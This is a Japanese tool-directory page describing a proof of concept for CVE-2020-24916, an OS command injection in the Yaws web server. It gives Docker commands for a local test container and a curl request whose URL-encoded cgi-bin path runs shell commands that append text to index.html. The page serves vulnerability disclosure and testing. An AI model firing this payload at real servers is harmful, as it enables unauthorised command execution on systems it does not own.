Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
poc-yaws-cgi-shell-injection — Yaws Webサーバー OSコマンドインジェクション POC | Kitploit
ツール/GitHubGitHub/vulnbe/poc-yaws-cgi-shell-injection
脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubvulnbe/poc-yaws-cgi-shell-injection

poc-yaws-cgi-shell-injection

Yaws Webサーバー OSコマンドインジェクション POC

リポジトリを見る
15年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Yaws WebサーバーにおけるOSコマンドインジェクション (CVE-2020-24916)

概念実証

テストイメージをビルド:

docker build -t vulnbe/yaws-pocs:shell-injection-appmod-cgi -f Dockerfile .

および/または

コンテナを実行 docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:shell-injection-appmod-cgi

root@kitploit:~
curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22'
curl http://127.0.0.1:8000/index.html

クレジット

Alexey Pronin (@vulnbe)

参考

  • 脆弱性分析
  • GitHub上のYaws
  • CVE-2020-24916
  • CWE-78: OSコマンドに使用される特殊要素の不適切な無害化('OSコマンドインジェクション')
ツールをダウンロード